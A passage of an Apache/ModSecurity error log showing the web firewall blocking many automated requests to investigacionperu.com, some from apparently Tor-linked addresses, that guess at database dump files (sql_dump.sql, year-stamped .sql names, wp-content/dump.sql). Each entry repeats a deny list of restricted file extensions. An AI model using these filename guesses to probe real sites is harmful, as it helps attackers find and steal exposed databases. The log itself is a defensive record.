10:15:54.538488 2024] [:error] [pid 30828:tid 139722626148096] [client 185.220.101.86:33236] [client 185.220.101.86] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/sql_dump.sql"] [unique_id "ZoqxKjbJWLg2ecbngu9H2AAAAIU"] [Sun Jul 07 10:15:55.017691 2024] [:error] [pid 30827:tid 139722567399168] [client 185.220.101.86:33238] [client 185.220.101.86] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_ionperu.sql"] [unique_id "ZoqxK0GuaLybMBNkB61tUQAAAEw"] [Sun Jul 07 10:15:56.114973 2024] [:error] [pid 30826:tid 139722466686720] [client 185.220.101.86:33240] [client 185.220.101.86] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/3.sql"] [unique_id "ZoqxLPcO2IzqYGkif72oWAAAABg"] [Sun Jul 07 10:15:58.739164 2024] [:error] [pid 31926:tid 139722668111616] [client 185.220.101.86:33242] [client 185.220.101.86] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/igacionperu_2023.sql"] [unique_id "ZoqxLnug2jzbr_AlO3dxtwAAAMA"] [Sun Jul 07 10:16:00.157645 2024] [:error] [pid 30826:tid 139722517042944] [client 78.142.18.219:33244] [client 78.142.18.219] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-vestigacionperu.sql"] [unique_id "ZoqxMPcO2IzqYGkif72oWQAAABI"] [Sun Jul 07 10:16:02.493677 2024] [:error] [pid 30827:tid 139722575791872] [client 78.142.18.219:33246] [client 78.142.18.219] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-gacionperu.sql"] [unique_id "ZoqxMkGuaLybMBNkB61tUgAAAEs"] [Sun Jul 07 10:16:02.974879 2024] [:error] [pid 30826:tid 139722475079424] [client 78.142.18.219:33248] [client 78.142.18.219] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-u.sql"] [unique_id "ZoqxMvcO2IzqYGkif72oWgAAABc"] [Sun Jul 07 10:16:03.436412 2024] [:error] [pid 30826:tid 139722642933504] [client 78.142.18.219:33250] [client 78.142.18.219] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_acionperu.sql"] [unique_id "ZoqxM_cO2IzqYGkif72oWwAAAAM"] [Sun Jul 07 10:16:04.450776 2024] [:error] [pid 30826:tid 139722651326208] [client 185.220.101.176:33252] [client 185.220.101.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/u_2023.sql"] [unique_id "ZoqxNPcO2IzqYGkif72oXAAAAAI"] [Sun Jul 07 10:16:04.884376 2024] [:error] [pid 30826:tid 139722634540800] [client 185.220.101.176:33254] [client 185.220.101.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ionperu_2023.sql"] [unique_id "ZoqxNPcO2IzqYGkif72oXQAAAAQ"] [Sun Jul 07 10:16:05.421577 2024] [:error] [pid 30826:tid 139722500257536] [client 185.220.101.176:33256] [client 185.220.101.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-ionperu.sql"] [unique_id "ZoqxNfcO2IzqYGkif72oXgAAABQ"] [Sun Jul 07 10:16:05.926878 2024] [:error] [pid 30828:tid 139722642933504] [client 185.220.101.176:33258] [client 185.220.101.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/affiliates.sql"] [unique_id "ZoqxNTbJWLg2ecbngu9H2QAAAIM"] [Sun Jul 07 10:16:06.454979 2024] [:error] [pid 31926:tid 139722617755392] [client 185.220.101.176:33260] [client 185.220.101.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/gacionperu-2022.sql"] [unique_id "ZoqxNnug2jzbr_AlO3dxuAAAAMY"] [Sun Jul 07 10:16:07.045829 2024] [:error] [pid 31926:tid 139722634540800] [client 185.220.101.176:33262] [client 185.220.101.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2024.sql"] [unique_id "ZoqxN3ug2jzbr_AlO3dxuQAAAMQ"] [Sun Jul 07 10:16:07.513950 2024] [:error] [pid 31926:tid 139722584184576] [client 185.220.101.176:33264] [client 185.220.101.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/gacionperu_2023.sql"] [unique_id "ZoqxN3ug2jzbr_AlO3dxugAAAMo"] [Sun Jul 07 10:16:08.020998 2024] [:error] [pid 31926:tid 139722491864832] [client 185.220.101.176:33266] [client 185.220.101.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mysql_debug.sql"] [unique_id "ZoqxOHug2jzbr_AlO3dxuwAAANU"] [Sun Jul 07 10:16:08.566449 2024] [:error] [pid 31926:tid 139722550613760] [client 185.220.101.176:33268] [client 185.220.101.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-estigacionperu.sql"] [unique_id "ZoqxOHug2jzbr_AlO3dxvAAAAM4"] [Sun Jul 07 10:16:09.129232 2024] [:error] [pid 30828:tid 139722466686720] [client 185.241.208.115:33270] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/dump.sql"] [unique_id "ZoqxOTbJWLg2ecbngu9H2gAAAJg"] [Sun Jul 07 10:16:09.919414 2024] [:error] [pid 31926:tid 139722542221056] [client 185.241.208.115:33272] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_nperu.sql"] [unique_id "ZoqxOXug2jzbr_AlO3dxvQAAAM8"] [Sun Jul 07 10:16:10.444861 2024] [:error] [pid 30827:tid 139722634540800] [client 185.241.208.115:33274] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_igacionperu.sql"] [unique_id "ZoqxOkGuaLybMBNkB61tUwAAAEQ"] [Sun Jul 07 10:16:10.961951 2024] [:error] [pid 30827:tid 139722533828352] [client 185.241.208.115:33276] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/forum.sql"] [unique_id "ZoqxOkGuaLybMBNkB61tVAAAAFA"] [Sun Jul 07 10:16:11.478672 2024] [:error] [pid 31926:tid 139722508650240] [client 185.241.208.115:33278] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/sales.sql"] [unique_id "ZoqxO3ug2jzbr_AlO3dxvgAAANM"] [Sun Jul 07 10:16:12.001607 2024] [:error] [pid 30826:tid 139722491864832] [client 185.241.208.115:33280] [client 185.241.208.115] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver 